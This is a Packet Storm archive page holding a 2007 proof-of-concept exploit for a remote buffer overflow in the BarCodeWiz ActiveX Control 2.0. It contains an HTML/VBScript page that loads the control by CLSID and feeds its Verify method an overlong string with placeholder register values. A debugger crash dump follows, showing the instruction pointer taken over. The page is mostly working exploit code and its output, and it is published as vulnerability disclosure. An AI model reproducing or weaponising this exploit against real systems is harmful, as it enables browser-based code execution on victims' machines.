what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

barcode-dos.txt

barcode-dos.txt
Posted May 10, 2007
Authored by shinnai | Site shinnai.altervista.org

Month of ActiveX Bugs - BarCodeWiz ActiveX Control version 2.0 remote buffer overflow exploit proof of concept code.

tags | exploit, remote, denial of service, overflow, activex, proof of concept
SHA-256 | 1f90274bb566b88a182b7200de331f57d0d4800cc7505c47f890c853ae628970
Download | Favorite | View

barcode-dos.txt

Change Mirror Download
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/09</b></p></span>
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">--------------------------------------------------------------------------------
 <b>BarCodeWiz ActiveX Control 2.0 (BarcodeWiz.dll) Remote Buffer Overflow Exploit</b>
 url: http://www.barcodewiz.com/
 price: from $139 to $2,350

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 Tested on Windows XP Professional SP2 full patched
--------------------------------------------------------------------------------
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the LockModules test" style="WIDTH: 350px; HEIGHT: 25px" size=20>
<script language = 'vbscript'>
Sub tryMe
buff = String(1032,"A")

get_EAX = "aaaa"

buff2 = String(1132,"A")

get_EIP = "bbbb"

egg = buff + get_EAX + buff2 + get_EIP + buff

test.Verify egg
End Sub
</script>
faultmon dump:

14:39:21.000  pid=1244 tid=1534  EXCEPTION (first-chance)
              ----------------------------------------------------------------
              Exception C0000005 (ACCESS_VIOLATION reading [61616239])
              ----------------------------------------------------------------
              EAX=61616161: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EBX=03558474: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
              ECX=01D1E375: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
              EDX=01D1F020: 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41
              ESP=01D1F014: 00 00 00 00 1C 0A 57 03-70 1B EB 03 41 41 41 41
              EBP=01D1F420: 41 41 41 41 41 41 41 41-61 61 61 61 41 41 41 41
              ESI=770F4C3B: 8B FF 55 8B EC 8B 45 08-85 C0 74 05 8B 40 FC D1
              EDI=01D1F010: 7C 9E 55 03 00 00 00 00-1C 0A 57 03 70 1B EB 03
              EIP=03E9F9C6: 8B 88 D8 00 00 00 52 8B-01 FF 50 0C 85 C0 8B 45
                            --> MOV ECX,[EAX+000000D8]
              ----------------------------------------------------------------

14:39:21.000  pid=1244 tid=1534  EXCEPTION (first-chance)
              ----------------------------------------------------------------
              Exception C0000005 (ACCESS_VIOLATION reading [62626262])
              ----------------------------------------------------------------
              EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              ECX=62626262: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EDX=7C9137D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00
              ESP=01D1EC44: BF 37 91 7C 2C ED D1 01-94 F8 D1 01 48 ED D1 01
              EBP=01D1EC64: 14 ED D1 01 8B 37 91 7C-2C ED D1 01 94 F8 D1 01
              ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EIP=62626262: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
                            --> N/A
              ----------------------------------------------------------------
</span></span>
</code></pre>

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close